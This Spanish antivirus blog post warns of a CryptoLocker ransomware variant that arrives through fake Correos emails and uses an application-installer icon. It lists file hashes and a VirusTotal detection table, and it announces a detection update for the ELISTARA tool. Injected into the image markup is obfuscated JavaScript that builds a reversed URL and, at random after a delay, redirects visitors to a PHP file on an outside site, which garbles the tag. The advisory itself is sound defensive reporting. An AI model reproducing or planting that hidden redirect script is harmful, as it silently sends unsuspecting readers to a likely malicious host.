NUEVA VARIANTE DE CRYPTOLOCKER QUE YA NO USA ICONO DE CARPETA
Seguimos recibiendo falsos mails de Correos que infectan con el ransomware cRYPTOLOCKER de los ultimos dias, que dejan fichero infeccioso con icono ce carpeta, para confundir al usuario y que al “entrar” en ella ejecute el fichero EXE asociado, pero el último que recibimos ya no tiene dicho icono, sino uno nuevo de instalacion de aplicaciones, segun se muestra en la imagen:
iconos de cryptolocker.jpg
tolocker/” rel=”attachment wp-att-68800″>{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tolocker.jpg” alt=”iconos de cryp<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tolocker” width=”446″ height=”59″ />
Este con icono de instalacion lo pasamos a controlar a partir de la version 34.35 del ELISTARA de hoy, junto con otros que nos lleguen de dicho ransomware, sea cual fuere su icono.
El preanalisis de virustotal ofrece el siguiente informe:
MD5 5ea0acd5d92bc0061dcdf00d3e946e82
SHA1 02ceb25c19ac6cfef10b1462afbcef8f17aea22e
Tamaño del fichero 357.4 KB ( 365941 bytes )
SHA256: c5b9ed39ebface90305b2bcfc0c2333c4cea242c84c31dccca4eb16f4b5e77be
Nombre: informacion_19532.exe
Detecciones: 21 / 57
Fecha de análisis: 2016-04-15 08:18:08 UTC ( hace 1 minuto )
0 1
Antivirus Resultado Actualización
Ad-Aware Trojan.GenericKD.3157498 20160415
AegisLab Backdoor.W32.Androm!c 20160415
Arcabit Trojan.Generic.D302DFA 20160415
Avira (no cloud) TR/Crypt.Xpack.bqyp 20160415
Baidu Win32.Trojan.WisdomEyes.151026.9950.9956 20160414
BitDefender Trojan.GenericKD.3157498 20160415
DrWeb Trojan.Encoder.4361 20160415
ESET-NOD32 Win32/Filecoder.TorrentLocker.A 20160415
Emsisoft Trojan.GenericKD.3157498 (B) 20160415
F-Secure Trojan.GenericKD.3157498 20160415
GData Trojan.GenericKD.3157498 20160415
Kaspersky Backdoor.Win32.Androm.jljs 20160415
Malwarebytes Trojan.Kovter 20160415
McAfee Artemis!5EA0ACD5D92B 20160415
McAfee-GW-Edition BehavesLike.Win32.Dropper.fc 20160415
eScan Trojan.GenericKD.3157498 20160415
Qihoo-360 HEUR/QVM42.1.Malware.Gen 20160415
Rising PE:Malware.Generic/QRS!1.9E2D [F] 20160415
Sophos Troj/Ransom-CVQ 20160415
Symantec SAPE.Heur.A0B77 20160415
Tencent Win32.Backdoor.Androm.Szvk 20160415
Dicha version del ELISTARA 34.35 que lo detecta y elimina, estará disponible en nuestra web a partir de las 15 h CEST de hoy
saludos
ms, 15-4-2016
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.